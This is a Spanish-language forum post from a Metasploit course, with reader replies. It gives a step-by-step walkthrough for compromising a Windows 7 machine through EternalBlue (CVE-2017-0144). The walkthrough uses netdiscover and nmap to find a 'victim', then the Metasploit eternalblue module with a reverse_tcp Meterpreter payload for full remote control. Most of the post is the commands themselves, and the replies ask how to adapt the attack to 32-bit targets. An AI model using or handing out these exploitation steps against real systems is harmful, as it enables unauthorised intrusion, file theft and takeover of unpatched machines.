Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue

Iniciado por puntoCL, Diciembre 30, 2017, 04:33:06 AM

Tema anterior - Siguiente tema

0 Miembros y 2 Visitantes están viendo este tema.




En esta tercer parte vamos a conseguir un meterpreter con el famoso exploit ETERNALBLUE.

Dejare esto dos conceptos para que se entienda un poco mas.

SMB: Es un protocolo de red que permite compartir archivos, impresoras, etcétera, entre nodos de una red que usan sistema operativo Windows

CVE: Common Vulnerabilities and Exposures, "Vulnerabilidades y exposiciones comunes" Este es un estándar para nombrar vulnerabilidades de seguridad. CVE-YYYY-NNNN YYYY indica el año y NNNN indica el número de la vulnerabililocal.

ETERNALBLUE: Es un exploit de una vulnerabilidad del protocolo (SMB). Esta vulnerabilidad se indica mediante como CVE-2017-0144. Esta vulnerabilidad existe porque el servidor SMB versión 1 (SMBv1) maneja mal los paquetes especialmente diseñadas de ataque remotos y esto permite ejecutar código arbitrario.

El 8 de abril del 2017, TheShadowBroker público una gran arsenal de herramientas de hacking de la NSA. Lo cual lo puedes ver en GitHub

No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Este exploit solo ataca a sistema operativos Windows 7 y Windows server 2008. Lo extraordinario de este exploit es que no se necesita enviar un tipio de archivo "PAYLOAD" y espera que la víctima lo ejecute y pensar como engañar a la víctima con ingeniera social  para que ejecute dicho archivo, Bueno con este exploit es totalmente lo contrario no necesitas crear nada, solo necesita configurar algunos parámetros básicos y tendrás el control total de una máquina.

Estare simulando un ataque real.

Primero tenemos que identificar la víctima y para eso tenemos que ver que máquinas están conectado en nuestra red y para eso ocuparemos una herramienta que busque host vivos. Con la herramienta NETDISCOVER



Esta herramienta básicamente lo que hace es detectar los host que están conectado en nuestra red, Esta herramienta hace su búsqueda por medio de peticiones ARP.

Código: php
netdiscover -i wlan0 -r 192.168.0.0/24


-i = La interfaz de red que estaremos utilizando, para ver nuestra interfaz ocupe ifconfig.

-r = El rango del escaneo.

Y como resultado no aparecerán todos los host conectado.



Como podrán ver tengo tres host:

192.168.0.1: sería el router
192.168.0.100: Maquina de la víctima
192.168.0.102: Un celular.

Ya una vez identificada la victima que sería la IP 192.168.0.100 por lo cual tenemos que saber si esa máquina es vulnerable o no, por lo cual ocuparemos nmap esta herramienta tiene script para escanear vulnerabilidades. El script que estaremos utilizando --script smb-vuln-ms17-010.nse y a la vez veremos qué sistema operativo es la máquina de la victima.

Código: php
nmap -sC -sV -p 445 --script smb-vuln-ms17-010.nse 192.168.0.100


Y no aparecerá esto.



Como podemos ver el resultado nos dice que es un Windows 7 y que el equipo es VULNERABLE. Ahora nos queda ejecutar nuestro metasploit y buscar enternablue, para eso ocuparemos el comando search.

Código: php
search eternablue




Nos aparecerá dos módulos que sería el auxiliar que es lo mismo que hicimos en nmap para identificar si la máquina de la víctima es vulnerable. Y el otro modulo es el exploit.

Para ingresar al módulo del exploit de enternablue se ocupar el comando use

Código: php
use exploit/windows/smb/ms17_010_eternalblue




Ahora nos falta setear y colocaremos la IP de nuestra victima

Código: php
set RHOST 192.168.0.100


Ahora crearemos un payload para obtener el meterpreter. Si nosotros no creamos el payload al momento de atacar como resultado obtendremos el cmd de la máquina de la víctima y en cambio sí obtenernos un meterpreter podemos hacer un fin de cosas como descarga archivo, subir archivos, capturar pantalla, etc....

Código: php
set payload windows/x64/meterpreter/reverse_tcp


Y por finalizar nos queda LHOST que sería la IP de nuestra máquina. Con el comando ifconfig sabremos cual es nuestra IP.



En mi caso la IP que tengo seria 192.168.0.101   

Código: php
set LHOST 192.168.0.101


Escribimos show options    



Ahora nos falta ejecutar para eso escribimos:   

Código: php
exploit


Y listo nuestro exploit se estará ejecutado y obtendremos el meterpreter que tanto deseamos.



Para finalizar el post si escriben help podrán ver todo el comando del meterpreter. El siguiente post estaré hablado todo el comando de meterpreter.



No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Curso Metasploit - Part. 3 - Como obteber un meterpreter con EternalBlue
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta






si la pc de la victima es de arquitectura 32 bits como seria ya que eternnablue como modulo de metasploit solo soporta maquinas 64 bits

He investigado un poco para hacer la prueba en una maquina virtual x86 pero no he tenido exito... lleve a cabo este procedimiento: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Al final no obtengo ningun error pero tampoco me da la sesión.


He investigado un poco y encontre estos enlaces.
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Pero no he dado con la solución a mi problema.
He comprobado que esta deshabilitado el firewall y no tengo antivirus.

 Yo en la parte de "maneja mal los paquetes especialmente diseñadas de ataque remotos y esto permite ejecutar código arbitrario" he alucinado pepinillos sinceramente.